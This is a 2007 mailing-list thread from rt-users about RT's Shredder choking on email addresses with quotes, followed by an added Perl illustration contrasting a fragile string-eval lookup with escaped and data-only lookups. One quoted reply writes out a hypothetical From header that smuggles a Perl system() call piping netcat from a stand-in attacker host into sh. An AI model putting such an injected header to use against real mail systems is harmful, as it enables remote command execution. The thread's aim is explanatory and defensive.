[rt-users] Spam email question

Mathew theillien at yahoo.com
Thu Feb 8 13:24:32 EST 2007


It is definitely the email portion and not the RT username portion.
When I get to work tonight I will create a user with an email address
such as the one I describe so I can reproduce the error.  I'll post it here.

Mathew

der Mouse wrote:
>> Shredder doesn't like when an email address contains either a single-
>> or double-quote.
> 
> An email address, or the name associated with an email address?  If it
> really is broken enough to get upset when an email address includes
> unbalanced quotes, it's, well, broken; "\(*&$%\""@example.com is a
> perfectly good email address, as is '^#&!`|@example.com.  (Some people
> have even used such addresses, and find they don't get picked up by
> spammer scrapeware - a useful property for email addresses to have.)
> 
> Even if it's the associated name, I'd call that somewhat broken.  I
> know someone who uses "Patrick O'Reilly" as the name portion of his
> email address (not coincidentally, that's his name).
> 
>> Understandably so considering this messes with Perl and makes it look
>> for a closing, matching mark.
> 
> I find that extremely disturbing, because it implies that RT is
> encountering these things in contexts where its string parsing code is
> kicking in.  This makes me wonder if perhaps a mail bearing a header
> like
> 
> From: "; system('cat /dev/null | nc evil.cracker.example.org 12345 | sh'); $dummy = " <me at innocent.example.org>
> 
> would do something nasty.  (It would even be legal from an email point
> of view.)
> 
> /~\ The ASCII				der Mouse
> \ / Ribbon Campaign
>  X  Against HTML	       mouse at rodents.montreal.qc.ca
> / \ Email!	     7D C8 61 52 5D E7 2D 39  4E F1 31 3E E8 B3 27 4B
> 
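
An added illustration of the concern raised in the quoted reply. It is not part of the original thread and is not RT or Shredder code, which the thread does not show. It assumes a hypothetical lookup that pastes an address into Perl source text, and compares it with escaping the value and with treating the address purely as data. The `%users` table, the function names and the third address are constructed for the example.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use B ();

# Constructed user table keyed by address. The first two addresses are the
# ones quoted in the message above; the third is a constructed apostrophe case.
our %users = (
    q{"\(*&$%\""@example.com} => 'user-1',
    q{'^#&!`|@example.com}    => 'user-2',
    q{o'reilly@example.com}   => 'user-3',
);

# Hypothetical fragile pattern: the address is pasted into Perl source text
# and compiled with string eval, so a single quote in the data ends the
# literal early and the rest of the address is parsed as code.
sub lookup_fragile {
    my ($addr) = @_;
    my $found = eval "\$users{'$addr'}";
    return defined $found ? $found : 'FAILED (generated source did not parse)';
}

# If source text must be generated, serialise the value as a Perl string
# literal first. B::perlstring escapes quotes, backslashes, $ and @.
sub lookup_escaped {
    my ($addr) = @_;
    my $found = eval '$users{' . B::perlstring($addr) . '}';
    return defined $found ? $found : 'FAILED';
}

# Preferred: the address never becomes source text, so its characters are
# never seen by the Perl parser at all.
sub lookup_data {
    my ($addr) = @_;
    return exists $users{$addr} ? $users{$addr} : 'not found';
}

for my $addr (sort keys %users) {
    print "$addr\n";
    printf "  fragile: %s\n", lookup_fragile($addr);
    printf "  escaped: %s\n", lookup_escaped($addr);
    printf "  data:    %s\n", lookup_data($addr);
}
```

The fragile lookup succeeds for the address that happens to contain no single quote and fails for the other two, which is why this kind of defect tends to surface only for particular users.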



